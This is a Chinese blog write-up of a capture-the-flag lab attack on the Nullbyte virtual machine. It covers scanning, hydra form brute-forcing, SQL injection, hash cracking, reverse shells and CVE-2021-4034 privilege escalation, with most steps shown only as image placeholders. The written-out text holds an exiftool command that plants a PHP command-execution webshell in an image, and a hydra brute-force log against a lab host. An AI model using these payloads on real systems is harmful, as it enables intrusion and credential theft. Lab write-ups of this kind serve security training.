第十五篇红队笔记-百靶精讲之Nullbyte-exiftool图片-hydra表单-john md5-sql大小马-CVE-2021-4034

本文介绍了使用Nmap进行信息收集,目录爆破和源码分析,检测web表单进行SQL注入,包括数据库猜解和暴力破解,以及如何通过SQL注入获取权限,利用如John、MD5解密和shell反弹等技术。同时涉及到了exiftool在图片中的恶意操作和Hydra表单爆破工具的使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

nmap信息收集

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

web渗透

  • 目录爆破
    在这里插入图片描述

在这里插入图片描述

  • 源码无发现,下载静态资源look
    在这里插入图片描述

  • 可能是ssh密码,可能是mysql密码,最后是web路由
    在这里插入图片描述

hydra暴力破解web表单

  • 确定是需要的登陆和不需要验证码的表单
    在这里插入图片描述

SQL注入

数据库猜解-布尔类型

在这里插入图片描述
在这里插入图片描述

手动

测试字段个数

在这里插入图片描述

数据库信息

在这里插入图片描述

再次获取数据库

在这里插入图片描述

获取数据表

在这里插入图片描述

获取数据表字段

在这里插入图片描述

获取数据表字段值

在这里插入图片描述

sqlmap

获取数据库

在这里插入图片描述

获取数据表

在这里插入图片描述

获取数据表字段

在这里插入图片描述

获取数据表字段值

在这里插入图片描述

John暴力破解md5格式hash

base64解密

在这里插入图片描述

md5解密

  • john
    在这里插入图片描述
  • hashcat(破解文本写前,字典写后)
    在这里插入图片描述

获得系统初始权限shell

在这里插入图片描述

SQL注入-写入一句话木马

  • system类型函数是命令执行而不是代码执行
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  • eval类型函数是代码执行而不是命令执行(一句话木马)
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

SQL注入-写入反弹shell

在这里插入图片描述
在这里插入图片描述

提权

SUID可执行文件提权

  • 搜索备份文件
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

CVE-2021-4034提权

在这里插入图片描述
在这里插入图片描述

其他

exiftool

  • 图片工具
#查看所有信息
exiftool photo.jpg
# 为一个图片生成图片码,图片码为我们的木马
exiftool poc.jpg -documentname="<?php echo exec(\$_POST['cmd']); ?>"

hydra 表单爆破

└─$ hydra 10.0.2.10 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l zgc -P /usr/share/wordlists/rockyou.txt                                           │Image Width                     : 235
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, t│Image Height                    : 302
hese *** ignore laws and ethics anyway).Has Color Map                   : NoColor Resolution Depth          : 8
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-04 01:14:19Bits Per Pixel                  : 1
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task                                                      │Background Color                : 0
[DATA] attacking http-post-form://10.0.2.10:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key                                                                             │Comment                         : P-): kzMb5nVYJw
[STATUS] 4566.00 tries/min, 4566 tries in 00:01h, 14339833 to do in 52:21h, 16 active                                                                                  │Image Size                      : 235x302
[STATUS] 4652.00 tries/min, 13956 tries in 00:03h, 14330443 to do in 51:21h, 16 active                                                                                 │Megapixels                      : 0.071
[80][http-post-form] host: 10.0.2.10   login: zgc   password: elite                                                                                                    │                                                                                                                                                                       
1 of 1 target successfully completed, 1 valid password found                                                                                                           │┌──(kali?kali)-[/tmp]
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-04 01:19:45                                                                                     │└─$ vi 2main.gif 
                                                                                         
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值